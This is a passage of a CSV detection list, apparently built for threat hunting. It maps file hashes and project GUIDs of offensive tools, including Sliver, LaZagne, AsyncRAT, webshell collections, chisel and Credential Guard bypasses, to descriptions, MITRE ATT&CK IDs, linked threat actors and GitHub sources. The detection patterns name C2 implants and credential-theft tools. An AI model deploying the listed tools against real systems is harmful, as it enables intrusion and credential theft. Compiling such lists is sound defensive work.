T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","36934" "*c3a499f047b670e888a41b33749ffc9227b7b0bcc4e9f0882d272918ee3a17d1*",".{0,1000}c3a499f047b670e888a41b33749ffc9227b7b0bcc4e9f0882d272918ee3a17d1.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","#filehash","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","36936" "*c3a9123c48f1c7024efc87373bf3471e9ee2e5dcdddce594764f21d3123f9cbd*",".{0,1000}c3a9123c48f1c7024efc87373bf3471e9ee2e5dcdddce594764f21d3123f9cbd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","36937" "*c3b029e9e7077164976a5f73399b07dd481ac41d524328f933a4cd62a36af679*",".{0,1000}c3b029e9e7077164976a5f73399b07dd481ac41d524328f933a4cd62a36af679.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36939" 
"*c3b46bc3370bed3629df3e71ec1e85102b3920bff11c59ecb14bb45c80748d79*",".{0,1000}c3b46bc3370bed3629df3e71ec1e85102b3920bff11c59ecb14bb45c80748d79.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36940" "*c3b6f81b25c7315d9a856dbc0ed1b129b2e0b39553fbd8a50a4145de6aa8ed42*",".{0,1000}c3b6f81b25c7315d9a856dbc0ed1b129b2e0b39553fbd8a50a4145de6aa8ed42.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","36942" "*c3b7a095eb5860b4414e354becc07bf30a9133737164b89b689873ee9f9c7bd6*",".{0,1000}c3b7a095eb5860b4414e354becc07bf30a9133737164b89b689873ee9f9c7bd6.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","36943" "*c3c1f7819a3b5421a91af3f491e61eb49506c0a573f1583d66f0f178891a1a74*",".{0,1000}c3c1f7819a3b5421a91af3f491e61eb49506c0a573f1583d66f0f178891a1a74.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","36945" "*C3C49F45-2589-4E04-9C50-71B6035C14AE*",".{0,1000}C3C49F45\-2589\-4E04\-9C50\-71B6035C14AE.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","#GUIDproject","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","36947" "*C3C49F45-2589-4E04-9C50-71B6035C14AE*",".{0,1000}C3C49F45\-2589\-4E04\-9C50\-71B6035C14AE.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","36948" "*C3C49F45-2589-4E04-9C50-71B6035C14AE*",".{0,1000}C3C49F45\-2589\-4E04\-9C50\-71B6035C14AE.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","36949" "*c3c993b043322cac38d24d751229883227de36b38e2c8c1e0fc1ca0ff6f2fd9a*",".{0,1000}c3c993b043322cac38d24d751229883227de36b38e2c8c1e0fc1ca0ff6f2fd9a.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","#filehash","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","36950" "*c3d0bfe503699cc1ed0452f3775e008b4e3983e21a2df33a8b47fe21555a4833*",".{0,1000}c3d0bfe503699cc1ed0452f3775e008b4e3983e21a2df33a8b47fe21555a4833.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","36952" "*c3d5848ea1ce007268f965e577fcdbbf343921d0d75c52b981499ef97a6e54e5*",".{0,1000}c3d5848ea1ce007268f965e577fcdbbf343921d0d75c52b981499ef97a6e54e5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","36953" "*c3e1e5a3e7b7e2d270582b233f94888de48d37642b9a6cdc019d2703aa1e4f0c*",".{0,1000}c3e1e5a3e7b7e2d270582b233f94888de48d37642b9a6cdc019d2703aa1e4f0c.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","36957" "*c3e38acce6f3bca15fac349fd9f7eb41aa415a76fdf150bd0e75bc096467402f*",".{0,1000}c3e38acce6f3bca15fac349fd9f7eb41aa415a76fdf150bd0e75bc096467402f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - 
T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","36958" "*c3e7919dd51fbeb12a7d6d4038a144cf4ae9c13793bdf137efb034dda6ed515b*",".{0,1000}c3e7919dd51fbeb12a7d6d4038a144cf4ae9c13793bdf137efb034dda6ed515b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","36959" "*c3f50756edbddbf72190cbdac5a0084b2c11e6aeab95b63d4da786547a693d73*",".{0,1000}c3f50756edbddbf72190cbdac5a0084b2c11e6aeab95b63d4da786547a693d73.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36961" "*c3f5c77284e7440792843e51ec944d85bf0b3edf600b622832682a00e3c002d9*",".{0,1000}c3f5c77284e7440792843e51ec944d85bf0b3edf600b622832682a00e3c002d9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36962" "*c3l3si4n/webtrufflehog*",".{0,1000}c3l3si4n\/webtrufflehog.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","1","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","36964" 
"*c417429bfef774a5aad6d5a745b741f291fc0bd1b48514bfd4fbca9345e43384*",".{0,1000}c417429bfef774a5aad6d5a745b741f291fc0bd1b48514bfd4fbca9345e43384.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36973" "*c4209649986c6f8b14571e8f08553cd89046c45a1a03d1ab1b69b03d4b745eb9*",".{0,1000}c4209649986c6f8b14571e8f08553cd89046c45a1a03d1ab1b69b03d4b745eb9.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36975" "*c4375226178ff89c7d58598072dce4ab139c71fdf311071936d8331dc11cd90b*",".{0,1000}c4375226178ff89c7d58598072dce4ab139c71fdf311071936d8331dc11cd90b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36976" "*c439db633c51838ba79ec999e0f5b4533379b94d2afeb5944fd15250fa5a86de*",".{0,1000}c439db633c51838ba79ec999e0f5b4533379b94d2afeb5944fd15250fa5a86de.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - 
T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","36977" "*c43b0658e94f065828af720b96f2d5f130d3929c7b37867897dc2512375559ad*",".{0,1000}c43b0658e94f065828af720b96f2d5f130d3929c7b37867897dc2512375559ad.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","36978" "*c44037f720d823a5d8ef14efde9fd0b9fcf5cd36cf0db159e1ae67ebac1e3b7e*",".{0,1000}c44037f720d823a5d8ef14efde9fd0b9fcf5cd36cf0db159e1ae67ebac1e3b7e.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","36979" "*c45986288840a01919c3b744499554d5a0608a2a109de0952b80303923cd3ce8*",".{0,1000}c45986288840a01919c3b744499554d5a0608a2a109de0952b80303923cd3ce8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36981" "*c4614aa579c4b2bd0703218c1e8d5cab85c31a986278dc909edee7ca00687a3a*",".{0,1000}c4614aa579c4b2bd0703218c1e8d5cab85c31a986278dc909edee7ca00687a3a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36983" "*c4645180927fea47c25236d1ef856476f818b04d048042577cc4793f4d1dc040*",".{0,1000}c4645180927fea47c25236d1ef856476f818b04d048042577cc4793f4d1dc040.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36984" "*c4677593f3d871965055ff5c05412b2a6a0f70bd8d7bdc33c409bdc5669b925c*",".{0,1000}c4677593f3d871965055ff5c05412b2a6a0f70bd8d7bdc33c409bdc5669b925c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36985" "*c46f4d7407e46fd600a3e400128c22a599bf7152068af8304fbd47c91ca39698*",".{0,1000}c46f4d7407e46fd600a3e400128c22a599bf7152068af8304fbd47c91ca39698.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","36988" "*c47d02f06bc853b2917607af695be6f81013ffa31f4ff13e6bbf8ff835ee40ec*",".{0,1000}c47d02f06bc853b2917607af695be6f81013ffa31f4ff13e6bbf8ff835ee40ec.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36993" "*c4913bf62aa78117b312fb37677f5b6d24bb96f22b72a3d0a8166d917f21a3d6*",".{0,1000}c4913bf62aa78117b312fb37677f5b6d24bb96f22b72a3d0a8166d917f21a3d6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36996" "*c498592eebde7dec4227e1fe83002fca10beab096138e6d64278ef868a85900f*",".{0,1000}c498592eebde7dec4227e1fe83002fca10beab096138e6d64278ef868a85900f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36998" "*c4abc4537dc209944170e16642c57b9c0d97d9de38557ee3ed3ac27ee68f9b91*",".{0,1000}c4abc4537dc209944170e16642c57b9c0d97d9de38557ee3ed3ac27ee68f9b91.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","37000" "*c4ae18df3ccf102f9ae58af818678b96adb1fdc581ffc6625367ffeda420a33f*",".{0,1000}c4ae18df3ccf102f9ae58af818678b96adb1fdc581ffc6625367ffeda420a33f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37001" 
"*c4b86273fcc42e5771b3983ef4150b9818f0038a7df0effb68ce1303c1459b73*",".{0,1000}c4b86273fcc42e5771b3983ef4150b9818f0038a7df0effb68ce1303c1459b73.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37003" "*c4baa8972cd078acdbbddc5db31b73bdabb84b88cf06e133e7cb34fbc316761e*",".{0,1000}c4baa8972cd078acdbbddc5db31b73bdabb84b88cf06e133e7cb34fbc316761e.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37005" "*c4bb5669fe12e106bd6bb7a0fde51cf6e90d73bbd6e4143df40eb53d2f7da776*",".{0,1000}c4bb5669fe12e106bd6bb7a0fde51cf6e90d73bbd6e4143df40eb53d2f7da776.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","37006" "*c4c624294090555e88aff480bc19f55ffcd1b51dda2dbf55fe35dde60b374fd1*",".{0,1000}c4c624294090555e88aff480bc19f55ffcd1b51dda2dbf55fe35dde60b374fd1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37007" "*c4c99f7ff1976731ad0a4c3514f291f925f030c3c80d70d93ca98e3bf69a853e*",".{0,1000}c4c99f7ff1976731ad0a4c3514f291f925f030c3c80d70d93ca98e3bf69a853e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37010" "*c4d31433-5017-4b5e-956b-8a540520986c*",".{0,1000}c4d31433\-5017\-4b5e\-956b\-8a540520986c.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#GUIDproject","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","37012" "*c4d95bff1eced83e423deb8555d636b02c290adba785a349bc776711bbc2841e*",".{0,1000}c4d95bff1eced83e423deb8555d636b02c290adba785a349bc776711bbc2841e.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#filehash","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","37013" "*c4da631e510a57e39a6e9021a1d3f1d563f59f351bdd84b46e48a0e27e6b9cbb*",".{0,1000}c4da631e510a57e39a6e9021a1d3f1d563f59f351bdd84b46e48a0e27e6b9cbb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","37014" "*c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98*",".{0,1000}c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","37015" "*c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98*",".{0,1000}c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","37016" 